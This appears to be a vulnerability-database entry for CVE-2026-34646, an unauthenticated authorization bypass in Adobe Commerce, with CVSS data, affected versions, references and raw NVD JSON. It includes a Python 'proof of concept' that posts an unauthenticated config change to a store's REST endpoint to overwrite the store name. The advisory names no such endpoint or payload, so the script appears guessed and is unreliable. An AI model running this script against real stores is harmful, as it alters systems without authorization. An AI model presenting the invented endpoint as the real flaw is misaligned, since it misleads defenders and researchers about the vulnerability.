CVE-2026-34646

Description

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Adobe Commerce <= 2.4.9-beta1

Adobe Commerce <= 2.4.8-p4

Adobe Commerce <= 2.4.7-p9

Adobe Commerce <= 2.4.6-p14

Adobe Commerce <= 2.4.5-p16

Adobe Commerce <= 2.4.4-p17

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# Proof of Concept for CVE-2026-34646 (Unauthorized Write Access)
# Description: This script attempts to exploit an authorization bypass to change configuration.

import requests

target_url = "http://target-adobe-commerce.com"
vulnerable_endpoint = "/rest/V1/config/settings"

# Malicious payload to demonstrate unauthorized write access
payload = {
    "config": {
        "path": "general/store_information/name",
        "value": "HACKED_BY_CVE_2026_34646"
    }
}

headers = {
    "Content-Type": "application/json",
    "User-Agent": "CVE-2026-34646-Scanner"
}

try:
    # Sending request without authentication headers to simulate PR:N
    response = requests.post(target_url + vulnerable_endpoint, json=payload, headers=headers, timeout=10)

    if response.status_code == 200:
        print("[+] Exploit successful! Unauthorized write access confirmed.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status Code: {response.status_code}")
        print(f"[-] Response: {response.text}")

except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34646
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34646
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34646/
[4] VulDB https://vuldb.com/cve/CVE-2026-34646
[5] https://helpx.adobe.com/security/products/magento/apsb26-49.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34646", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:35.560", "lastModified": "2026-05-13T14:49:11.830", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://helpx.adobe.com/security/products/magento/apsb26-49.html", "source": "[email protected]"}]}}